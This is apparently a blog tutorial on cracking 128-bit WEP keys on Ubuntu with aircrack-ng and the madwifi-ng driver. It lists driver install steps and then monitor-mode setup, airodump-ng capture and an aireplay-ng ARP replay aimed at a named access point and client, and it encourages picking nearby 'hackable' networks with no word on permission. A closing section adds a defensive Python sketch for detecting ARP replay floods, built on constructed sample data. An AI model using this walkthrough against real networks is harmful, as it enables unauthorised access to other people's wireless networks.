Hacking on Linux

Music by Koil: Aku Luka Aku Lupa


Hacking 128bit WEP with aircrack-ng using madwifi-ng driver
on Ubuntu Edgy Eft 6.10
1. Install madwifi-ng
ifconfig ath0 down
rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name 'ath*' -exec rm -v {} \; 2>/dev/null
find /lib/modules -name 'wlan*' -exec rm -v {} \; 2>/dev/null
svn checkout http://svn.madwifi.org/branches/madwifi-old/ madwifi-old
wget http://patches.aircrack-ng.org//madwifi-old-r1417.patch
cd madwifi-old
patch -Np1 -i ../madwifi-old-r1417.patch
make KERNELPATH=/usr/src/linux-
make install KERNELPATH=/usr/src/linux-
depmod -ae
Reboot your box first; madwifi-ng sometimes hangs after install. If you get errors,
check dmesg:
[17184021.008000] ath_hal: (AR5210, AR5211, AR5212, RF5111, RF5112, RF2413, RF5413)
[17184021.008000] ath_rate_sample: disagrees about version of symbol
[17184021.008000] ath_rate_sample: Unknown symbol ieee80211_iterate_nodes
[17184021.008000] ath_rate_sample: disagrees about version of symbol ieee80211_proc_vcreate
[17184021.008000] ath_rate_sample: Unknown symbol ieee80211_proc_vcreate
[17184021.012000] ath_pci: Unknown symbol ath_rate_tx_complete
[17184021.012000] ath_pci: disagrees about version of symbol ieee80211_encap
[17184021.012000] ath_pci: Unknown symbol ieee80211_encap
To load the kernel module:
modprobe ath_pci
2. Install aircrack-ng
apt-get install aircrack-ng
3. Hack it!
First, create a device in monitor mode:
root@lapos:~# wlanconfig ath1 create wlandev wifi0 wlanmode monitor ath1
root@lapos:~# ifconfig ath1 up
Check which wifi networks around you might be hackable: run airodump-ng without the -c
flag and just look around. If you find a wifi network that has enough clients on it and the signal
strength is good enough, run airodump-ng like this:
root@lapos:~# airodump-ng ath1 -w lol -c 8

It will capture IVs from channel 8. That works, but it is too slow: for 128-bit WEP you need 1M IVs. How
can we go faster?

aireplay-ng --arpreplay -b 00:07:40:FE:26:B2 -h 00:30:65:08:10:92 ath1
The -b parameter is the attacked AP's MAC and the -h parameter is the MAC of one of the connected clients.
Screen 2: Running aireplay-ng
There are many ways to speed up the hack, but I won't show them; this is the fastest
method that is not so aggressive, and the clients will not notice what is going on.
Finally, analyse the airodump-ng output file to find the WEP key.
(For 64-bit keys use the -n64 switch in aircrack-ng.)
Good luck!
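
Seen from the defender's side, the ARP replay step above is loud on the air even if the clients notice nothing: one source MAC re-sends the same-length frame hundreds of times a second towards one AP. The sketch below is an added example, not part of the original post. It assumes a hypothetical sensor that already hands over (timestamp, BSSID, source MAC, length) records for ARP-request candidates; the sample records, MAC addresses, window and threshold are all constructed for illustration.

```python
from collections import defaultdict, deque

WINDOW_S = 1.0   # sliding window length in seconds (assumed value)
THRESHOLD = 50   # same-length ARP requests per window treated as a flood (assumed)

def build_sample():
    """Constructed records (timestamp_s, bssid, src_mac, length); not a real capture."""
    frames = []
    # Normal client: one ARP request every few seconds.
    for i in range(5):
        frames.append((i * 3.0, "AA:BB:CC:00:00:01", "AA:BB:CC:00:00:10", 68))
    # Replay pattern: the same-length frame re-sent every 2 ms.
    for i in range(400):
        frames.append((10.0 + i * 0.002, "AA:BB:CC:00:00:01", "AA:BB:CC:00:00:20", 68))
    return sorted(frames)

def detect_arp_replay(frames, window=WINDOW_S, threshold=THRESHOLD):
    """Return {(bssid, src): peak_count} for sources that exceed `threshold`
    identical-length ARP requests inside one sliding window."""
    recent = defaultdict(deque)  # (bssid, src, length) -> timestamps still in window
    alerts = {}
    for ts, bssid, src, length in frames:
        q = recent[(bssid, src, length)]
        q.append(ts)
        # Drop timestamps that have fallen out of the window.
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > threshold:
            key = (bssid, src)
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts

if __name__ == "__main__":
    for (bssid, src), peak in detect_arp_replay(build_sample()).items():
        print(f"possible ARP replay: src={src} bssid={bssid} peak={peak} per {WINDOW_S}s")
```

A legitimate client sends a handful of ARP requests per minute, so the threshold can stay far below the replay rate without raising false alerts.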


